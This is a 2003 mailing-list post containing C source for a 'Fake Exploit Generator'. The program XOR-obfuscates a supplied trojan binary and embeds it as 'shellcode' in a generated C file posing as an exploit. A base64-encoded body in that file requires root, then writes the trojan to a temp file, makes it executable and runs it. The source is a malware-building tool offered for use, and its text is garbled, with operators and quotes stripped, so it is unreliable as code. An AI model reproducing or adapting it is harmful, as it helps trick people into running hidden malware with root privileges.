On Friday 13 June 2003 06:51 pm, David Bernick wrote:
Well anyway, I got inspired:
// Fake Exploit Generator
// [EMAIL PROTECTED]
//
#include stdio.h
#include sys/types.h
#include sys/stat.h
#include unistd.h
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))
#define BEAUTIFY indent
char b64string[] =
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/;
static char header[] = {
Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr
Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1
ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K
};
static char body[] = {
dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK
CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g
bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy
KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0
KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK
CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w
ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs
Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3
cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw
NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu
dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo
KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K
};
long b64dec (char *to, char *from, unsigned int len)
{
char *fromp = from;
char *top = to;
char *p;
unsigned char cbyte;
unsigned char obyte;
int padding = 0;
for (; len = 4; len -= 4) {
if ((cbyte = *fromp++) == '=') cbyte = 0;
else {
if (badchar(cbyte, p)) return -1;
cbyte = (p - b64string);
}
obyte = cbyte 2; /* 1100 */
if ((cbyte = *fromp++) == '=') cbyte = 0;
else {
if (badchar(cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte 4;/* 0011 */
*top++ = obyte;
obyte = cbyte 4; /* */
if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
else {
padding = 0;
if (badchar (cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte 2;/* */
*top++ = obyte;
obyte = cbyte 6; /* 1100 */
if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
else {
padding = 0;
if (badchar (cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte; /* 0011 */
*top++ = obyte;
}
*top = 0;
if (len) return -1;
return (top - to) - padding;
}
void printhex(char c, FILE *fp)
{
char s[10];
if(c 16 c = 0)
{
fprintf(fp, \\x%2.2x, c);
}
else
{
if(c 0)
{
fprintf(fp, \\x%2.2x, c);
}
else
{
sprintf(s, %x, c);
fprintf(fp, \\x%c, s[6]);
fprintf(fp, %c, s[7]);
}
}
}
int main(int argc, char *argv[])
{
FILE *trojan;
FILE *fakeexp;
char byte[0];
int count = 0;
char *out;
out = (char *)malloc(sizeof(body));
memset(out, 0, sizeof(out));
#ifdef BEAUTIFY
char *cmd;
#endif
if(argc 4 )
{
printf(usage: %s trojan fakeexp.c key\n, argv[0]);
printf(ex: %s trojan fakeexp.c 187\n, argv[0]);
exit(0);
}
trojan = fopen(argv[1], r);
fakeexp = fopen(argv[2], w);
if(trojan fakeexp)
{
b64dec(out, header, sizeof(header));
fprintf(fakeexp, %s, out);
memset(out, 0, sizeof(out));
fprintf(fakeexp, \n#define MAX\t%s\n\n, argv[3]);
fprintf(fakeexp, static char shellcode[] = {\n);
while(!feof(trojan))
{
memset(byte, 0, sizeof(byte));
fread(byte, 1, 1, trojan);
byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate
if(count 15)
{
if(count == 0)
{
fprintf(fakeexp, \);
}
printhex(byte[0], fakeexp);
count++;
}
else
{
printhex(byte[0], fakeexp);
fprintf(fakeexp, \\n);
count = 0;
}
}
fprintf(fakeexp, \\n};\n\n);
b64dec(out, body, sizeof(body));
fprintf(fakeexp, %s, out);